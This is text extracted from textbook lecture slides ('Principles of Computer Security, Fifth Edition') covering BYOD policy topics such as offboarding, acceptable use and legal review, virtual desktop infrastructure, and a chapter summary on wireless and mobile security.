Personal devices used for work may lead to strong expectations that privacy will be protected by the company.

Policy needs to consider and address this explicitly.

Principles of Computer Security, Fifth Edition

BYOD (7 of 12)

Onboarding/Offboarding

When new employees join a company, the on-boarding processes need to include provisions for mobile device responsibilities.

Mobile devices supplied by the company should be collected upon termination.

BYOD equipment should have its access to corporate resources terminated as part of the off-boarding process.

Regular audits for old or unterminated accounts should be performed to ensure prompt deletion of accounts for terminated employees.

Principles of Computer Security, Fifth Edition

BYOD (8 of 12)

Adherence to corporate policies

Corporate policies regarding BYOD devices should be consistent with your existing computer security policies.

Training programs should include instruction on mobile device security.

Disciplinary actions should be consistent.

Monitoring programs should be enhanced to include monitoring and control of mobile devices.

Principles of Computer Security, Fifth Edition

BYOD (9 of 12)

BYOD user acceptance

BYOD inherently creates a conflict between personal and corporate interests.

Corporate BYOD policy needs to be well defined, approved by the corporate legal department, and clearly communicated to all employees through training.

Principles of Computer Security, Fifth Edition

BYOD (10 of 12)

Architecture/infrastructure considerations

Mobile devices consume connections to your corporate IT infrastructure.

It is recommended that load testing be performed to ensure that your design or existing infrastructure can support the potentially large number of connections from multiple devices.

Multiple connections can also create security issues when the system tracks user accounts against multiple connections

Principles of Computer Security, Fifth Edition

BYOD (11 of 12)

Legal concerns

Many security challenges are presented by mobile devices used for corporate business.

Make sure you have solid legal review of policies.

Policies and procedures should be reviewed on a regular basis to stay current with technology.

One challenge is the possibility that mobile devices will be used for illegal purposes.

Principles of Computer Security, Fifth Edition

BYOD (12 of 12)

Acceptable use policy

An acceptable use policy should address authorized usage of corporate devices for personal purposes

Disciplinary actions for violation should be defined.

Principles of Computer Security, Fifth Edition

VDI (1 of 2)

In the case of laptops, a virtual desktop infrastructure (VDI) solution can bring control to the mobile environment associated with non-corporate-owned equipment.

Enterprise can set up virtual desktop machines.

Fully security compliant

Contain all the necessary applications needed by the employee

Let the employee access the virtual machine via either a virtual connection or a remote desktop connection

Principles of Computer Security, Fifth Edition

VDI (2 of 2)

Can solve most if not all of the security and application functionality questions associated with mobile devices.

Does require an IT organization capable of setting up, maintaining, and managing the VDI in the enterprise:

Not necessarily a small task

Based on number of instances needed

Principles of Computer Security, Fifth Edition

Chapter Summary

Describe the different wireless systems in use today.

Detail WAP and its security implications.

Identify 802.11’s security issues and possible solutions.

Learn about the different types of wireless attacks.

Examine the elements needed for enterprise wireless deployment.

Examine the security of mobile systems.

Principles of Computer Security, Fifth Edition

144